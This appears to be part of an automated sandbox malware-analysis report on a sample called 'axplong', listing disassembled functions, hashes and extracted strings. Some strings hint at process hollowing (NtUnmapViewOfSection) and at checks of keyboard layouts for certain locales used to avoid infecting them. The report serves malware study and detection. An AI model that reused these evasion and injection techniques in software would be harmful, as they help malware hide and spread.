Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: 37f2e3f96269596ac6892ffa1675b052c7fc1a4e6d7ed0abe427930343359a54
Instruction ID: d102e220a91b2a3541e0fcf970e6c92187b8ec0fb6499f12010a8391ec472477
Opcode Fuzzy Hash: 37f2e3f96269596ac6892ffa1675b052c7fc1a4e6d7ed0abe427930343359a54
Instruction Fuzzy Hash: FB82F870904248DBEF28EF68C9897DE7FB5AF46304F504598E805273C2D7799A89CBD2

Function 00C6D312 Relevance: .2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00C5247E

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: e506f06b12a1cf319fdee8f24a53a367d24a6d96b3b2ef48617496736ab4dc71
Instruction ID: 3c63a5eaaf603e26fe17e7e726b9e314d8e9790be926aba6b916b8b1a3835e68
Opcode Fuzzy Hash: e506f06b12a1cf319fdee8f24a53a367d24a6d96b3b2ef48617496736ab4dc71
Instruction Fuzzy Hash: 8451BEB1E006058FDB25DF59E8C17AEB7F4FB48310F24866AD816EB290D7759A40DFA0

Function 00C63550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C6425F

Part of subcall function 00C67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C6795C
Part of subcall function 00C67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C67968
Part of subcall function 00C67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C67971

Strings

aZT6, xrefs: 00C653CC
MJB+, xrefs: 00C64776, 00C647ED, 00C64A95, 00C64B0C
9KN6, xrefs: 00C65351
V0x6, xrefs: 00C6541E
JB6, xrefs: 00C653F5
stoi argument out of range, xrefs: 00C62E02, 00C64269, 00C64EAC
Fz==, xrefs: 00C6369E, 00C64D2D
V0N6, xrefs: 00C6537A
V5Qk, xrefs: 00C63DC0
invalid stoi argument, xrefs: 00C62DE9, 00C62DF8, 00C6425A, 00C64E9D
8ZF6, xrefs: 00C65502
HBhr, xrefs: 00C6378F
aqB6, xrefs: 00C654DB
5120, xrefs: 00C63ABF, 00C63BAA
KFT0PL==, xrefs: 00C654B9
96B6, xrefs: 00C65470
", xrefs: 00C63E99
W07l, xrefs: 00C63AEE
MJF+, xrefs: 00C647BD, 00C648EC, 00C64ADC, 00C64C0B
Vp 6, xrefs: 00C65447
9526, xrefs: 00C6531D
5F6, xrefs: 00C65497
6F9fr==, xrefs: 00C64712
fed3aa, xrefs: 00C65489
246122658369, xrefs: 00C61EA5, 00C627EE, 00C62A43, 00C62AB0, 00C62E88, 00C63373, 00C633D4, 00C64F3A, 00C64F4D, 00C64F8F, 00C64F99, 00C654F4
mP=, xrefs: 00C66383
WJms, xrefs: 00C63BD9
WJP6, xrefs: 00C653A3

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-3875209911
Opcode ID: a302671d77ec2df1091467867da4f91809fd34c2c3cafea3be103afbaae31be0
Instruction ID: 0df85c5f75713af9b68562d72a100d73b7be9580afe7ebbac3cc916835a01472
Opcode Fuzzy Hash: a302671d77ec2df1091467867da4f91809fd34c2c3cafea3be103afbaae31be0
Instruction Fuzzy Hash: 64522770A10248DBDF28EF78CC8AB9D7B75AF46304F50469CE405A72C2D7759B84DBA2

Function 00C646C0 Relevance: 28.7, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00C67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C6795C
Part of subcall function 00C67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C67968
Part of subcall function 00C67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C67971

std::_Xinvalid_argument.LIBCPMT ref: 00C64EA2

Strings

aqB6, xrefs: 00C654DB
aZT6, xrefs: 00C653CC
KFT0PL==, xrefs: 00C654B9
96B6, xrefs: 00C65470
MJB+, xrefs: 00C64776, 00C647ED, 00C64A95, 00C64B0C
9KN6, xrefs: 00C65351
V0x6, xrefs: 00C6541E
JB6, xrefs: 00C653F5
MJF+, xrefs: 00C647BD, 00C648EC, 00C64ADC, 00C64C0B
Vp 6, xrefs: 00C65447
9526, xrefs: 00C6531D
stoi argument out of range, xrefs: 00C64269, 00C64EAC
Fz==, xrefs: 00C6369E, 00C64D2D
V0N6, xrefs: 00C6537A
5F6, xrefs: 00C65497
6F9fr==, xrefs: 00C64712
fed3aa, xrefs: 00C65489
8ZF6, xrefs: 00C65502
246122658369, xrefs: 00C64F3A, 00C64F4D, 00C64F8F, 00C64F99, 00C654F4
mP=, xrefs: 00C66383, 00C66652
WJP6, xrefs: 00C653A3

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 4234742559-1662704651
Opcode ID: 433302ee9de2ccace66a3cd470678c240ec2fce5204917e74d9d1d8cef0bb77e
Instruction ID: 7fe4c2e02165bf505c30fa8cbe2a15fb970a39a9f8e780ed4fabb1d85be3ec6e
Opcode Fuzzy Hash: 433302ee9de2ccace66a3cd470678c240ec2fce5204917e74d9d1d8cef0bb77e
Instruction Fuzzy Hash: D6231471E001589BEB29DB28CDC979DBB769B85308F5482D8E009AB2C2DB359FC5CF51

Function 00C558F0 Relevance: 17.8, Strings: 14, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00C55FA8
GVQsgL==, xrefs: 00C566F8
NtUnmapViewOfSection, xrefs: 00C57158
00000422, xrefs: 00C55FD9
, xrefs: 00C57140
Keyboard Layout\Preload, xrefs: 00C55F64
IVKsgL==, xrefs: 00C567A1
ntdll.dll, xrefs: 00C5715D
00000423, xrefs: 00C5600A
stoi argument out of range, xrefs: 00C57051
invalid stoi argument, xrefs: 00C57060
(, xrefs: 00C57206
RBPleCSm, xrefs: 00C5666C
0000043f, xrefs: 00C5603B

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: $($00000419$00000422$00000423$0000043f$GVQsgL==$IVKsgL==$Keyboard Layout\Preload$NtUnmapViewOfSection$RBPleCSm$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 0-2634686781
Opcode ID: 467e76c54acd10e7d7bae2b5939d323731ef2d7e4d7651771d9b493f2dcb632e
Instruction ID: 24aa451334ab6ed2aa90d42b601b3cf79cccef9ea0417864334e102f89badf2c
Opcode Fuzzy Hash: 467e76c54acd10e7d7bae2b5939d323731ef2d7e4d7651771d9b493f2dcb632e
Instruction Fuzzy Hash: 0FB14A74E00684CFDB14DF68D8A0BADBBB2FF49300F10465DE8119B382D775AA89CB94

Function 00C5BD60 Relevance: 7.8, Strings: 6, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8KG0fymoFx==, xrefs: 00C5C2EB, 00C5C543
8KG0fCKZFzY=, xrefs: 00C5C385
stoi argument out of range, xrefs: 00C5E3FA
RpKt, xrefs: 00C5D516
RHYTYv==, xrefs: 00C5BE33
invalid stoi argument, xrefs: 00C5E404

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 0-332458646
Opcode ID: 33378478f6ea558a0aeed78d9e0d0b206b605914880233572f704b59165cdf6e
Instruction ID: a22820af3368e09ca92178560717479726fdb6b27547ae5370430077a095ede0
Opcode Fuzzy Hash: 33378478f6ea558a0aeed78d9e0d0b206b605914880233572f704b59165cdf6e
Instruction Fuzzy Hash: 5FB1E5B1A002189FEB24CF28CC85B9EBB65EF45305F5041A9F909972C2DB759EC4CF99

Function 00C55DF0 Relevance: 6.6, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00C55FA8
00000423, xrefs: 00C5600A
00000422, xrefs: 00C55FD9
Keyboard Layout\Preload, xrefs: 00C55F64
0000043f, xrefs: 00C5603B

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 149c7728b3c37574e47ae5a59cc7d213a66e2ce171dc6d882ac51a66025509f2
Instruction ID: c9432dc0646ebd48c1533f09736097bfed6eb50558590d360c4904a70f931f44
Opcode Fuzzy Hash: 149c7728b3c37574e47ae5a59cc7d213a66e2ce171dc6d882ac51a66025509f2
Instruction Fuzzy Hash: F6E18E71900218ABEB24DFA4CC89BDEB779AF04304F9042D9E909A7291D774AFC9CF55

Function 00C57D00 Relevance: 4.1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JmpyPb==, xrefs: 00C5810A
JmpxQb==, xrefs: 00C581B2
JmpxRL==, xrefs: 00C58062

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 0-2057465332
Opcode ID: 7af89f1f3716153c071357ba77ee8aa3c53a11710ac9ddce531bbae4a817f3f8
Instruction ID: aee885b59193f948f44f82cf765354e8903ad253f4248c3ee1bf578a8d39d91e
Opcode Fuzzy Hash: 7af89f1f3716153c071357ba77ee8aa3c53a11710ac9ddce531bbae4a817f3f8
Instruction Fuzzy Hash: B8D13674E006049BDF24BB28DC5B39D7B71AB46311F900398E816AB3D2DB355EC89BD6

Function 00C565B0 Relevance: 4.0, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

GVQsgL==, xrefs: 00C566F8
RBPleCSm, xrefs: 00C5666C
IVKsgL==, xrefs: 00C567A1

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 0-3856690409
Opcode ID: 10b6d8d5ed00421ce9fe6f51d021241cbc821a3086abaad0dbdda95b922e31f0
Instruction ID: 92b0195876fbebdc9136549be9ab84debe1ea9f1eef4960db8148e0a769c4527
Opcode Fuzzy Hash: 10b6d8d5ed00421ce9fe6f51d021241cbc821a3086abaad0dbdda95b922e31f0
Instruction Fuzzy Hash: 3991E7B5A001189BDB28DF24CC85BEDB779EF45304F8045E9E51997282DA359FC8CFA8

Function 00C5B920 Relevance: 3.9, Strings: 3, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8KG0fymoFx==, xrefs: 00C5C2EB, 00C5C543
8KG0fCKZFzY=, xrefs: 00C5C385
RHYTYv==, xrefs: 00C5BE33

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==
API String ID: 0-2524226959
Opcode ID: 17a61445ee466e2eca600988cc11b852a34a09661573a7f1cd2949792e3ab5c6
Instruction ID: 4ff5105b2e1f390a01fffc9ebfdecd07556caa27d8e4ab77d9ebf53674109115
Opcode Fuzzy Hash: 17a61445ee466e2eca600988cc11b852a34a09661573a7f1cd2949792e3ab5c6
Instruction Fuzzy Hash: B041A131A101199FDF04CF68CC85BAE7BB5EF49315F108618F905EB680EB75AD85CB94

Function 00C86E01 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__dosmaperr.LIBCMT ref: 00C86F12

Part of subcall function 00C87177: __dosmaperr.LIBCMT ref: 00C871AC

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID:
API String ID: 2332233096-0
Opcode ID: 27434a2f9d4f110c3ea195bd541361e626b47c0e2f2efbe9c02a7b429f883c13
Instruction ID: f425f7d4d66ee50cde0435efd3c6e011e21287ce8ee14bd4660d92834d7ab533
Opcode Fuzzy Hash: 27434a2f9d4f110c3ea195bd541361e626b47c0e2f2efbe9c02a7b429f883c13
Instruction Fuzzy Hash: EC418A75900244ABCB24EFB5EC45AAFBBF9EF89304B10452DF956D3610EB31E904DB25

Function 00C594B0 Relevance: 1.5, Strings: 1, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UD==, xrefs: 00C59585

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: UD==
